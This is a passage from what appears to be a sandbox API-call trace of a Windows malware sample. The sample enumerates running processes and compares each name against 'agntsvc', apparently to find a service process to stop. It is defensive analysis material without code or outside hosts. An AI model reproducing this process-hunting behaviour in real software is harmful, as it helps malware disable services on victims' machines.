cntThreads=0x11, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.344] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.344] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3568328 [0093.344] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3568328, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.344] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.344] StrStrIA (lpFirst="svchost.exe", lpSrch="agntsvc") returned 0x0 [0093.344] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.345] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3568340 [0093.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3568340, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.345] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.345] StrStrIA (lpFirst="svchost.exe", lpSrch="agntsvc") returned 0x0 [0093.345] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.353] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3567680 [0093.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3567680, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.353] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.353] StrStrIA (lpFirst="svchost.exe", lpSrch="agntsvc") returned 0x0 [0093.353] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.354] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.354] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35675f0 [0093.354] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35675f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.354] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.354] StrStrIA (lpFirst="svchost.exe", lpSrch="agntsvc") returned 0x0 [0093.354] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.355] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.355] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3567548 [0093.355] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3567548, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.355] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.355] StrStrIA (lpFirst="svchost.exe", lpSrch="agntsvc") returned 0x0 [0093.355] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.356] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.356] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3567488 [0093.356] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3567488, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.356] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.356] StrStrIA (lpFirst="svchost.exe", lpSrch="agntsvc") returned 0x0 [0093.356] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.357] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.357] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35675a8 [0093.357] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35675a8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.357] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.357] StrStrIA (lpFirst="svchost.exe", lpSrch="agntsvc") returned 0x0 [0093.357] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0093.358] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.358] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35674b8 [0093.358] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x35674b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 12 [0093.358] lstrcpyA (in: lpString1=0x567fabc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0093.358] StrStrIA (lpFirst="spoolsv.exe", lpSrch="agntsvc") returned 0x0 [0093.358] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.359] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.359] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3567710 [0093.359] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3567710, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.360] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.360] StrStrIA (lpFirst="svchost.exe", lpSrch="agntsvc") returned 0x0 [0093.360] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0093.361] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.361] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3567698 [0093.361] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x3567698, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 12 [0093.361] lstrcpyA (in: lpString1=0x567fabc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0093.361] StrStrIA (lpFirst="audiodg.exe", lpSrch="agntsvc") returned 0x0 [0093.361] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0093.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0093.362] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3567650 [0093.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x3567650, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 11 [0093.362] lstrcpyA (in: lpString1=0x567fabc, lpString2="sihost.exe" | out: lpString1="sihost.exe") returned="sihost.exe" [0093.362] StrStrIA (lpFirst="sihost.exe", lpSrch="agntsvc") returned 0x0 [0093.362] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.363] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.363] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35675c0 [0093.363] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35675c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.363] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.363] StrStrIA (lpFirst="svchost.exe", lpSrch="agntsvc") returned 0x0 [0093.363] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0093.364] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0093.364] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3567560 [0093.364] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3567560, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0093.364] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0093.364] StrStrIA (lpFirst="taskhostw.exe", lpSrch="agntsvc") returned 0x0 [0093.364] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3d, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0093.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.365] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35674a0 [0093.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x35674a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 13 [0093.365] lstrcpyA (in: lpString1=0x567fabc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0093.365] StrStrIA (lpFirst="explorer.exe", lpSrch="agntsvc") returned 0x0 [0093.365] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0093.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0093.366] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3566e90 [0093.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x3566e90, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 21 [0093.366] lstrcpyA (in: lpString1=0x567fabc, lpString2="OfficeClickToRun.exe" | out: lpString1="OfficeClickToRun.exe") returned="OfficeClickToRun.exe" [0093.366] StrStrIA (lpFirst="OfficeClickToRun.exe", lpSrch="agntsvc") returned 0x0 [0093.366] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0093.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0093.367] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x3566570 [0093.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x3566570, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SecurityHealthService.exe", lpUsedDefaultChar=0x0) returned 26 [0093.367] lstrcpyA (in: lpString1=0x567fabc, lpString2="SecurityHealthService.exe" | out: lpString1="SecurityHealthService.exe") returned="SecurityHealthService.exe" [0093.367] StrStrIA (lpFirst="SecurityHealthService.exe", lpSrch="agntsvc") returned 0x0 [0093.367] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0093.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0093.368] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3566ff0 [0093.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x3566ff0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Memory Compression", lpUsedDefaultChar=0x0) returned 19 [0093.368] lstrcpyA (in: lpString1=0x567fabc, lpString2="Memory Compression" | out: lpString1="Memory Compression") returned="Memory Compression" [0093.369] StrStrIA (lpFirst="Memory Compression", lpSrch="agntsvc") returned 0x0 [0093.369] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0093.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0093.370] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x3566eb0 [0093.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x3566eb0, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 24 [0093.370] lstrcpyA (in: lpString1=0x567fabc, lpString2="ShellExperienceHost.exe" | out: lpString1="ShellExperienceHost.exe") returned="ShellExperienceHost.exe" [0093.370] StrStrIA (lpFirst="ShellExperienceHost.exe", lpSrch="agntsvc") returned 0x0 [0093.370] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0093.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.371] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35676b0 [0093.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x35676b0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 13 [0093.371] lstrcpyA (in: lpString1=0x567fabc, lpString2="SearchUI.exe" | out: lpString1="SearchUI.exe") returned="SearchUI.exe" [0093.371] StrStrIA (lpFirst="SearchUI.exe", lpSrch="agntsvc") returned 0x0 [0093.371] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0093.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0093.372] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x3566c50 [0093.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x3566c50, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 18 [0093.372] lstrcpyA (in: lpString1=0x567fabc, lpString2="RuntimeBroker.exe" | out: lpString1="RuntimeBroker.exe") returned="RuntimeBroker.exe" [0093.372] StrStrIA (lpFirst="RuntimeBroker.exe", lpSrch="agntsvc") returned 0x0 [0093.372] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0093.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.373] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35676c8 [0093.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x35676c8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0093.373] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0093.373] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="agntsvc") returned 0x0 [0093.373] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pending.exe")) returned 1 [0093.374] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.374] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3567590 [0093.374] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x3567590, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pending.exe", lpUsedDefaultChar=0x0) returned 12 [0093.374] lstrcpyA (in: lpString1=0x567fabc, lpString2="pending.exe" | out: lpString1="pending.exe") returned="pending.exe" [0093.374] StrStrIA (lpFirst="pending.exe", lpSrch="agntsvc") returned 0x0 [0093.374] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="appointmentimpressed.exe")) returned 1 [0093.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0093.375] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x3566818 [0093.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x3566818, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="appointmentimpressed.exe", lpUsedDefaultChar=0x0) returned 25 [0093.375] lstrcpyA (in: lpString1=0x567fabc, lpString2="appointmentimpressed.exe" | out: lpString1="appointmentimpressed.exe") returned="appointmentimpressed.exe" [0093.375] StrStrIA (lpFirst="appointmentimpressed.exe", lpSrch="agntsvc") returned 0x0 [0093.375] Process32NextW (in: hSnapshot=0x350, 